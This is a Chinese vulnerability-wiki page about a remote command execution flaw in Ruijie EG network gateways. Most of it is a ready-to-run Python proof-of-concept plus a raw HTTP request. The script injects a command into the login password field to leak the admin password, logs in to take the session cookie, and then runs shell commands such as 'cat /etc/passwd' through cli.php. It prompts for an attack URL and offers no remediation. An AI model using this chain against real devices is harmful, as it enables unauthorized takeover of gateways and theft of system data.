免费、自由、人人可编辑的漏洞库
,
漏洞利用
发送以下请求:
POST /cli.php?a=shell HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 24 Content-Type: application/x-www-form-urlencoded Cookie: RUIJIEID=nk5erth9i0pvcco3n7fbpa9bi0;user=admin; X-Requested-With: XMLHttpRequest Accept-Encoding: gzip notdelay=true&command=id
POC
#!/usr/bin/python3 #-*- coding:utf-8 -*- # author : PeiQi # from : http://wiki.peiqi.tech import base64 import requests import random import re import json import sys def title(): print('+------------------------------------------') print('+ \03334mPOC_Des: http://wiki.peiqi.tech \0330m') print('+ \03334mGithub : https://github.com/PeiQi0 \0330m') print('+ \03334m公众号 : PeiQi文库 \0330m') print('+ \03334mVersion: 锐捷EG网关 cli.php RCE \0330m') print('+ \03336m使用格式: python3 poc.py \0330m') print('+ \03336mUrl >>> http://xxx.xxx.xxx.xxx \0330m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/login.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } data = 'username=admin&password=admin?show+webmaster+user' try: response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) print("\03336mo 正在执行 show webmaster user \0330m".format(target_url)) if "data" in response.text and response.status_code == 200: password = re.findall(r'admin (.*?)"', response.text)0 print("\03336mo 成功获取, 账号密码为: admin {} \0330m".format(password)) POC_2(target_url, password) except Exception as e: print("\03331mx 请求失败:{} \0330m".format(e)) sys.exit(0) def POC_2(target_url, password): vuln_url = target_url + "/login.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } data = 'username=admin&password={}'.format(password) try: response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) print("\03336mo 正在登录..... \0330m".format(target_url)) if "status" in response.text and "1" in response.text and response.status_code == 200: ruijie_cookie = "RUIJIEID=" + re.findall(r"'Set-Cookie': 'RUIJIEID=(.*?);", str(response.headers))0 + ";user=admin;" print("\03336mo 成功获取管理员Cookie: {} \0330m".format(ruijie_cookie)) POC_3(target_url, ruijie_cookie) except Exception as e: print("\03331mx 请求失败:{} \0330m".format(e)) sys.exit(0) def POC_3(target_url, ruijie_cookie): vuln_url = target_url + "/cli.php?a=shell" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded", "Cookie": "{}".format(ruijie_cookie) } data = 'notdelay=true&command=cat /etc/passwd' try: response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) print("\03336mo 正在执行 cat /etc/passwd..... \0330m".format(target_url)) if "root:" in response.text and response.status_code == 200: print("\03336mo 成功读取 /etc/passwd \no 响应为:{} \0330m".format(response.text)) except Exception as e: print("\03331mx 请求失败:{} \0330m".format(e)) sys.exit(0) if __name__ == '__main__': title() target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m")) POC_1(target_url)
PWNWIK.COM==免费、自由、人人可编辑的漏洞库